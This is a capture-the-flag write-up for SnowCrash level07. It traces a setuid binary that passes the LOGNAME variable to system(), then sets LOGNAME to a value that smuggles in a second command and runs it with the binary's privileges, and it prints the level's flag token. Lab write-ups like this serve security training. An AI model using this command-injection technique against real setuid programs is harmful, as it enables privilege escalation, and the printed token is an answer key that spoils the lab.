We run "ls -l" command in our home directory.

level07@SnowCrash:~$ ls -l
total 12
-rwsr-sr-x 1 flag07 level07 8805 Mar  5  2016 level07

We find a binary that used flag07 privileges.

We run it.

level07@SnowCrash:~$ ./level07
level07

Nothing interesting happens, so we trace it to see what I does.

level07@SnowCrash:~$ ltrace ./level07
__libc_start_main(0x8048514, 1, 0xbffff7a4, 0x80485b0, 0x8048620 <unfinished ...>
getegid()                                                                                                                                                                                                                         = 2007
geteuid()                                                                                                                                                                                                                         = 2007
setresgid(2007, 2007, 2007, 0xb7e5ee55, 0xb7fed280)                                                                                                                                                                               = 0
setresuid(2007, 2007, 2007, 0xb7e5ee55, 0xb7fed280)                                                                                                                                                                               = 0
getenv("LOGNAME")                                                                                                                                                                                                                 = "level07"
asprintf(0xbffff6f4, 0x8048688, 0xbfffff24, 0xb7e5ee55, 0xb7fed280)                                                                                                                                                               = 18
system("/bin/echo level07 "level07
 <unfinished ...>
--- SIGCHLD (Child exited) ---
<... system resumed> )                                                                                                                                                                                                            = 0
+++ exited (status 0) +++

We can see that the binary calls the function getenv() which prints the output of a environment variable. (https://www.tutorialspoint.com/c_standard_library/c_function_getenv.htm)
In our case it prints the output of the environment variable LOGNAME, which give us "level07"

The exploit here is very straight forward, we do an os injection of "getflag" by changing LOGNAME into getflag.

level07@SnowCrash:~$ export LOGNAME=\;\getflag

Then we just execute the binary.

level07@SnowCrash:~$ ./level07

Check flag.Here is your token : fiumuikeil55xe9cu4dood66h
